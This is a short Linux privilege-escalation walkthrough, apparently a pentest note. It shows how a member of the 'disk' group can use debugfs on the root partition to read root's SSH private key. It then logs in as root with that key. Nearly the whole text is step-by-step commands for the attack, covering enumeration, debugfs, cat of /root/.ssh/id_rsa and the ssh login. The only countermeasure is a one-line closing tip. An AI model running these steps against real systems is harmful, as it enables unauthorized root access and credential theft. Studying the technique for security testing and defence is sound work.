The disk group gives the user full access to any block devices contained within /dev/. Since /dev/sda1 will in general be the global file-system, and the disk group will have full read-write privileges to this device


1. Check the permissions on the current user

  • Id

2. Using LinEnum script can also help (

  • ./

3. List /dev devices owner and group owner

  • ls -l /dev

4. You can also find the partitions owned by disk group

  • find /dev -group disk

5. Also display the available partitions

  • df -h


1. Knowing your user is part of the disk group we can use debugfs to enumerate the entire disk with effectively root level privileges. We also have full read-write access to the disk block files, so we can extricate these or write arbitrary data to them. With the disk group, we are effectively root, just in a roundabout way. We will explore the partition where the / (root) directory is mounted on in this case /dev/sda2

  • debugfs /dev/sda2

2. Being in there we can write files, in our case this is read-only

  • cd /root
  • ls
  • mkdir test

3. In this case as we don’t have write permissions, we can try to read the ssh keys

  • cd /root/.ssh
  • ls
  • cat id_rsa

4. Copying the contents of this file in a new file in our local machine, and set proper permissions

  • vi id_rsa
  • chmod 600 id_rsa

5. Now using that key try to log into the server again

  • ssh -i id_rsa root@


Try not to assign users into the disk group